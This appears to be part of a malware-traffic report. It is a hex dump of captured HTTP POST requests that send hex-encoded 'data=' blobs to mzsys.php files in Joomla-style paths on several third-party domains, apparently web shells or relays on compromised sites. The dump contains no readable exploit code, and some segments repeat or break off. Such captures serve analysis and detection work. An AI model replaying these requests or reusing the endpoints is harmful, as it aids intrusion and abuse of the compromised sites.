0x000002b0 (00688)   37464144 30323836 41323442 38304338   7FAD0286A24B80C8
0x000002c0 (00704)   38344338 42443031 44303146 36373538   84C8BD01D01F6758
0x000002d0 (00720)   39453331 41453546 30384643 42333646   9E31AE5F08FCB36F
0x000002e0 (00736)   33304435 41343837 33383032 30333532   30D5A48738020352
0x000002f0 (00752)   42303943 31313337 37353239 43383744   B09C11377529C87D
0x00000300 (00768)   38314330 34463533 39343645 38463938   81C04F53946E8F98
0x00000310 (00784)   41314131 32323946 34363045 41363632   A1A1229F460EA662
0x00000320 (00800)   36313744 39433633 32364341 34343434   617D9C6326CA4444
0x00000330 (00816)   35453432 42394536 37393443 38464341   5E42B9E6794C8FCA
0x00000340 (00832)   36413145 39333446 33393545 39434337   6A1E934F395E9CC7
0x00000350 (00848)   37354130 37354446 37393832 32324136   75A075DF798222A6
0x00000360 (00864)   44393945 38454134 46304430 35394341   D99E8EA4F0D059CA
0x00000370 (00880)   41394632 37334434 37393435 44334532   A9F273D47945D3E2
0x00000380 (00896)   30323444 43333544 31304533 39384331   024DC35D10E398C1
0x00000390 (00912)   37443746 39434243 31353237 31384342   7D7F9CBC152718CB
0x000003a0 (00928)   42303734 34313246 37303843 41454638   B074412F708CAEF8
0x000003b0 (00944)   32314530 41353436 46304542 44304542   21E0A546F0EBD0EB
0x000003c0 (00960)   442db2                                D-.

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d3043   cache....data=0C
0x00000130 (00304)   33313036 46413733 32363230 32333741   3106FA732620237A
0x00000140 (00320)   42383436 35393331 39414430 44313643   B84659319AD0D16C
0x00000150 (00336)   30383034 33434432 46333643 32373837   08043CD2F36C2787
0x00000160 (00352)   34344646 43413142 33383831 32423641   44FFCA1B38812B6A
0x00000170 (00368)   46413442 37373237 45434339 36384234   FA4B7727ECC968B4
0x00000180 (00384)   42443146 41303841 41323838 35463145   BD1FA08AA2885F1E
0x00000190 (00400)   46354346 41303539 39334239 37323743   F5CFA05993B9727C
0x000001a0 (00416)   33354434 32453438 45414241 35413643   35D42E48EABA5A6C
0x000001b0 (00432)   44334634 46413038 45373744 31393239   D3F4FA08E77D1929
0x000001c0 (00448)   39413843 42393035 35373038 38394533   9A8CB905570889E3
0x000001d0 (00464)   33413834 37444645 35423646 32354430   3A847DFE5B6F25D0
0x000001e0 (00480)   38433245 45413135 37454138 43343442   8C2EEA157EA8C44B
0x000001f0 (00496)   34443232 38303245 34433543 44323234   4D22802E4C5CD224
0x00000200 (00512)   44463242 42453338 32344334 32343546   DF2BBE3824C4245F
0x00000210 (00528)   32384432 45313139 46463645 33424641   28D2E119FF6E3BFA
0x00000220 (00544)   32424333 30393731 44333030 45374435   2BC30971D300E7D5
0x00000230 (00560)   30314337 33443738 42454235 37353432   01C73D78BEB57542
0x00000240 (00576)   45464130 35343235 34374234 32314634   EFA0542547B421F4
0x00000250 (00592)   35424434 39384635 32333539 36353937   5BD498F523596597
0x00000260 (00608)   43383545 36354245 43453344 32434336   C85E65BECE3D2CC6
0x00000270 (00624)   44393843 32314545 42354646 34353941   D98C21EEB5FF459A
0x00000280 (00640)   35443834 43343343 34424443 31453730   5D84C43C4BDC1E70
0x00000290 (00656)   44414245 44374646 41394145 45384438   DABED7FFA9AEE8D8
0x000002a0 (00672)   41374641 44303238 36413234 42383043   A7FAD0286A24B80C
0x000002b0 (00688)   38383443 38424430 31443031 46363735   884C8BD01D01F675
0x000002c0 (00704)   38394533 31414535 46303846 43423336   89E31AE5F08FCB36
0x000002d0 (00720)   46333044 35413438 37333830 32303335   F30D5A4873802035
0x000002e0 (00736)   32423039 43313133 37373532 39433837   2B09C11377529C87
0x000002f0 (00752)   44383143 30344635 33393436 45384639   D81C04F53946E8F9
0x00000300 (00768)   38413141 31323239 46343630 45413636   8A1A1229F460EA66
0x00000310 (00784)   32363137 44394336 33323643 41343434   2617D9C6326CA444
0x00000320 (00800)   34354534 32423945 36373934 43384643   45E42B9E6794C8FC
0x00000330 (00816)   41364131 45393334 46333935 45394343   A6A1E934F395E9CC
0x00000340 (00832)   37373541 30373544 46373938 32323241   775A075DF798222A
0x00000350 (00848)   36443939 45384541 34463044 30353943   6D99E8EA4F0D059C
0x00000360 (00864)   41413946 32373344 34373934 35443345   AA9F273D47945D3E
0x00000370 (00880)   32303234 44433335 44313045 33393843   2024DC35D10E398C
0x00000380 (00896)   31374437 46394342 43313532 37313843   17D7F9CBC152718C
0x00000390 (00912)   42423037 34343132 46373038 43414546   BB074412F708CAEF
0x000003a0 (00928)   38323145 30413534 36463045 42444638   821E0A546F0EBDF8
0x000003b0 (00944)   32314530 41353436 46304542 44304542   21E0A546F0EBD0EB
0x000003c0 (00960)   442db2                                D-.

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a2073 2c202c20 2c202c20 2c202c20   t: s, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d30 43333130 36464137   ..data=0C3106FA7
0x00000160 (00352)   33323632 30323337 41423834 36353933   32620237AB846593
0x00000170 (00368)   31394144 30443136 43303830 34334344   19AD0D16C08043CD
0x00000180 (00384)   32463336 43323738 37343446 46434131   2F36C278744FFCA1
0x00000190 (00400)   42333838 31324236 41464134 42373732   B38812B6AFA4B772
0x000001a0 (00416)   37454343 39363842 34424431 46413038   7ECC968B4BD1FA08
0x000001b0 (00432)   41413238 38354631 45463543 46413035   AA2885F1EF5CFA05
0x000001c0 (00448)   39393342 39373237 43333544 34324534   993B9727C35D42E4
0x000001d0 (00464)   38454142 41354136 43443346 34464130   8EABA5A6CD3F4FA0
0x000001e0 (00480)   38453737 44313932 39394138 43423930   8E77D19299A8CB90
0x000001f0 (00496)   35353730 38383945 33334138 34374446   5570889E33A847DF
0x00000200 (00512)   45354236 46323544 30384332 45454131   E5B6F25D08C2EEA1
0x00000210 (00528)   35374541 38433434 42344432 32383032   57EA8C44B4D22802
0x00000220 (00544)   45344335 43443232 34444632 42424533   E4C5CD224DF2BBE3
0x00000230 (00560)   38323443 34323435 46323844 32453131   824C4245F28D2E11
0x00000240 (00576)   39464636 45334246 41324243 33303937   9FF6E3BFA2BC3097
0x00000250 (00592)   31443330 30453744 35303143 37334437   1D300E7D501C73D7
0x00000260 (00608)   38424542 35373534 32454641 30353432   8BEB57542EFA0542
0x00000270 (00624)   35343742 34323146 34354244 34393846   547B421F45BD498F
0x00000280 (00640)   35323335 39363539 37433835 45363542   523596597C85E65B
0x00000290 (00656)   45434533 44324343 36443938 43323145   ECE3D2CC6D98C21E
0x000002a0 (00672)   45423546 46343539 41354438 34433433   EB5FF459A5D84C43
0x000002b0 (00688)   43344244 43314537 30444142 45443746   C4BDC1E70DABED7F
0x000002c0 (00704)   46413941 45453844 38413746 41443032   FA9AEE8D8A7FAD02
0x000002d0 (00720)   38364132 34423830 43383834 43384244   86A24B80C884C8BD
0x000002e0 (00736)   30314430 31463637 35383945 33314145   01D01F67589E31AE
0x000002f0 (00752)   35463038 46434233 36463330 44354134   5F08FCB36F30D5A4
0x00000300 (00768)   38373338 30323033 35324230 39433131   8738020352B09C11
0x00000310 (00784)   33373735 32394338 37443831 43303446   377529C87D81C04F
0x00000320 (00800)   35333934 36453846 39384131 41313232   53946E8F98A1A122
0x00000330 (00816)   39463436 30454136 36323631 37443943   9F460EA662617D9C
0x00000340 (00832)   36333236 43413434 34343545 34324239   6326CA44445E42B9
0x00000350 (00848)   45363739 34433846 43413641 31453933   E6794C8FCA6A1E93
0x00000360 (00864)   34463339 35453943 43373735 41303735   4F395E9CC775A075
0x00000370 (00880)   44463739 38323232 41364439 39453845   DF798222A6D99E8E
0x00000380 (00896)   41344630 44303539 43414139 46323733   A4F0D059CAA9F273
0x00000390 (00912)   44343739 34354433 45323032 34444333   D47945D3E2024DC3
0x000003a0 (00928)   35443130 45333938 43313744 37463943   5D10E398C17D7F9C
0x000003b0 (00944)   42433135 32373138 43424230 37343431   BC152718CBB07441
0x000003c0 (00960)   32463730 38434145 46383231 45304135   2F708CAEF821E0A5
0x000003d0 (00976)   34364630 454244                       46F0EBD

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a20732c 202c202c 202c202c   cept: s, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d3043 33313036 46413733 32363230   a=0C3106FA732620
0x00000150 (00336)   32333741 42383436 35393331 39414430   237AB84659319AD0
0x00000160 (00352)   44313643 30383034 33434432 46333643   D16C08043CD2F36C
0x00000170 (00368)   32373837 34344646 43413142 33383831   278744FFCA1B3881
0x00000180 (00384)   32423641 46413442 37373237 45434339   2B6AFA4B7727ECC9
0x00000190 (00400)   36384234 42443146 41303841 41323838   68B4BD1FA08AA288
0x000001a0 (00416)   35463145 46354346 41303539 39334239   5F1EF5CFA05993B9
0x000001b0 (00432)   37323743 33354434 32453438 45414241   727C35D42E48EABA
0x000001c0 (00448)   35413643 44334634 46413038 45373744   5A6CD3F4FA08E77D
0x000001d0 (00464)   31393239 39413843 42393035 35373038   19299A8CB9055708
0x000001e0 (00480)   38394533 33413834 37444645 35423646   89E33A847DFE5B6F
0x000001f0 (00496)   32354430 38433245 45413135 37454138   25D08C2EEA157EA8
0x00000200 (00512)   43343442 34443232 38303245 34433543   C44B4D22802E4C5C
0x00000210 (00528)   44323234 44463242 42453338 32344334   D224DF2BBE3824C4
0x00000220 (00544)   32343546 32384432 45313139 46463645   245F28D2E119FF6E
0x00000230 (00560)   33424641 32424333 30393731 44333030   3BFA2BC30971D300
0x00000240 (00576)   45374435 30314337 33443738 42454235   E7D501C73D78BEB5
0x00000250 (00592)   37353432 45464130 35343235 34374234   7542EFA0542547B4
0x00000260 (00608)   32314634 35424434 39384635 32333539   21F45BD498F52359
0x00000270 (00624)   36353937 43383545 36354245 43453344   6597C85E65BECE3D
0x00000280 (00640)   32434336 44393843 32314545 42354646   2CC6D98C21EEB5FF
0x00000290 (00656)   34353941 35443834 43343343 34424443   459A5D84C43C4BDC
0x000002a0 (00672)   31453730 44414245 44374646 41394145   1E70DABED7FFA9AE
0x000002b0 (00688)   45384438 41374641 44303238 36413234   E8D8A7FAD0286A24
0x000002c0 (00704)   42383043 38383443 38424430 31443031   B80C884C8BD01D01
0x000002d0 (00720)   46363735 38394533 31414535 46303846   F67589E31AE5F08F
0x000002e0 (00736)   43423336 46333044 35413438 37333830   CB36F30D5A487380
0x000002f0 (00752)   32303335 32423039 43313133 37373532   20352B09C1137752
0x00000300 (00768)   39433837 44383143 30344635 33393436   9C87D81C04F53946
0x00000310 (00784)   45384639 38413141 31323239 46343630   E8F98A1A1229F460
0x00000320 (00800)   45413636 32363137 44394336 33323643   EA662617D9C6326C
0x00000330 (00816)   41343434 34354534 32423945 36373934   A44445E42B9E6794
0x00000340 (00832)   43384643 41364131 45393334 46333935   C8FCA6A1E934F395
0x00000350 (00848)   45394343 37373541 30373544 46373938   E9CC775A075DF798
0x00000360 (00864)   32323241 36443939 45384541 34463044   222A6D99E8EA4F0D
0x00000370 (00880)   30353943 41413946 32373344 34373934   059CAA9F273D4794
0x00000380 (00896)   35443345 32303234 44433335 44313045   5D3E2024DC35D10E
0x00000390 (00912)   33393843 31374437 46394342 43313532   398C17D7F9CBC152
0x000003a0 (00928)   37313843 42423037 34343132 46373038   718CBB074412F708
0x000003b0 (00944)   43414546 38323145 30413534 36463045   CAEF821E0A546F0E
0x000003c0 (00960)   42443730 38434145 46383231 45304135   BD708CAEF821E0A5
0x000003d0 (00976)   34364630 454244                       46F0EBD


Strings